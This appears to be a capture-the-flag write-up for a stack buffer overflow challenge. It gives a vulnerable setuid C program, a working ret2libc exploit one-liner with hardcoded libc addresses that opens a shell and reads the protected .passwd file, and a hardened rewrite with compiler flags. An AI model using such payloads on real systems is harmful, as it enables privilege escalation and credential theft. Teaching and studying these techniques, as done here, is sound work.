ELF x86: Stack buffer overflow basic 6
Environment configuration:

PIE (Position Independent Executable): No
RelRO (Read Only relocations): No
NX (Non-Executable Stack): Yes
ASLR (Address Space Layout Randomisation): No
SF (Source Fortification): No
SSP (Stack-Smashing Protection): No
SRC (Source code access): Yes
Source code:
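
    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main (int argc, char ** argv){
        char message[20];   /* fixed 20-byte stack buffer */

        if (argc != 2){
            printf ("Usage: %s <message>\n", argv[0]);
            return -1;
        }

        /* set real and effective UID to the effective UID of the binary */
        setreuid(geteuid(), geteuid());
        /* unbounded copy: argv[1] longer than 19 bytes overflows message */
        strcpy (message, argv[1]);
        printf ("Your message: %s\n", message);
        return 0;
    }
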
app-systeme-ch33@challenge02:~$ ./ch33 `python -c "print 'A'*32 + '\x10\x33\xe6\xb7' + 'DDDD' + '\x4c\x5d\xf8\xb7'"`
Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�3��DDDDL]��
$ cat .passwd
Resources
Counter moves
The final stack step assembles the full primitive. Layered mitigations are what make it costly in the real world. The defensive counterpart is in the blue notes on memory corruption and its limits.
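
A hardened counterpart to the challenge source, as an added example that is not part of the original challenge or of these notes: the unbounded strcpy is replaced by a length-checked copy that rejects over-long input instead of writing past the buffer. The helper name copy_message and the MESSAGE_SIZE macro are assumptions introduced here, and the build flags in the comment are one way to turn on the protections the table lists as "No".

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Suggested build (assumption, not from the page):
 *   gcc -O2 -D_FORTIFY_SOURCE=2 -fstack-protector-strong \
 *       -fPIE -pie -Wl,-z,relro,-z,now -o ch33_hardened ch33_hardened.c
 */

#define MESSAGE_SIZE 20   /* same buffer size as the challenge source */

/*
 * Hypothetical helper: copy src into dst only if it fits, terminator
 * included. Returns 0 on success, -1 on NULL or over-long input; on
 * failure dst (when usable) is left as an empty string.
 */
int copy_message(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* Measure src without ever looking further than dst could hold. */
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)            /* no room left for the terminator */
        return -1;
    memcpy(dst, src, len + 1);      /* len + 1 <= dst_size is guaranteed */
    return 0;
}

int main(int argc, char **argv)
{
    char message[MESSAGE_SIZE];

    if (argc != 2) {
        printf("Usage: %s <message>\n", argv[0]);
        return -1;
    }
    setreuid(geteuid(), geteuid());
    if (copy_message(message, sizeof message, argv[1]) != 0) {
        fprintf(stderr, "message too long (max %d bytes)\n", MESSAGE_SIZE - 1);
        return 1;
    }
    printf("Your message: %s\n", message);
    return 0;
}
```

Rejecting the input, rather than silently truncating it, keeps the failure visible to the caller and to any logging around the program.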